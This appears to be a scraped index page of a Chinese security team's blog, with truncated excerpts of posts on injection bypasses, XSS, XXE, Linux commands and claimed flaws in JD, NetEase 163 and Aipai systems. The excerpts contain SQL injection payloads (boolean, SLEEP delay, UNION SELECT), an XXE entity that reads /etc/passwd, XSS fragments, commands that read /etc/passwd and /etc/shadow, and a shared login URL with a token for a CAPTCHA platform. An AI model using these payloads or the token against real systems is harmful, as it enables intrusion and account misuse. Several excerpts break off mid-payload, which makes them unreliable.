14x safety team

memorial station of the team

三种注入方式的盲探绕过测试

三种注入方式的盲探绕过测试布尔盲注:' AND 6109=6109 AND 'eHNv'='eHNy延迟注入:' AND (SELECT * FROM (SELECT(SLEEP(5)))联合查询:' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6b71,0x6e5a67744172494e4e6342744c70784a716e674855,NULL,NULL,NULL,CON

浏览器,flash常用的XSS调用远程代码执行,实体注入(需要配合Charles分析)

<!ENTITY test SYSTEM "file:///etc/passwd"> encodeURIComponent('",a:(document.getElementsByTagName("script")[2].src=""),b:"')   ?debug=(function()%7Blocation.href%3D'javascript%3A%22%

kail2019 ISO msf5

kail2019 ISO msf5 :kail2019:https://images.offensive-security.com/kali-linux-2019.1a-amd64.iso.torrent

linux常用命令

mkdir  cat /etc/passwd(任意文件读取)cat /etc/shadow(有条件)touchps -autoprm shoudown -h nowsu roothistory   !ID  (比较好用)find / -name  find / -name  a*find /-name he* | grep wotar -czvf  ver.gz vertar -zxvf  /home/ longba

企查查 asdWakl

企查查 asdWakl

京东某处XSS

京东某处XSS         作者:0x80

网易163某系统未授权访问漏洞(无需登陆,管理员权限)

网易163某系统未授权访问漏洞(无需登陆,管理员权限)      作者:0x80

爱拍原创某系统存在逻辑缺陷漏洞(可审核用户的视频,语音,通过和删除)

爱拍原创某系统存在逻辑缺陷漏洞(可审核用户的视频,语音,通过和删除)        作者:0x80

某打码平台token自动登入,一般人我不告诉他

某打码平台token自动登入,一般人我不告诉他至于原理,自己去理解http://www.51ym.me/user/default.aspx?url=payment.aspx&token=00087365811523b15128baa2c8d219dc256acba0f001

从高级安全工程师到leader的转变

从高级安全工程师到leader的转变我觉得我要思考些什么1,前景2、方向3、学习4、管理

Powered By Z-BlogPHP 1.5.2 Zero

Please add: 182910788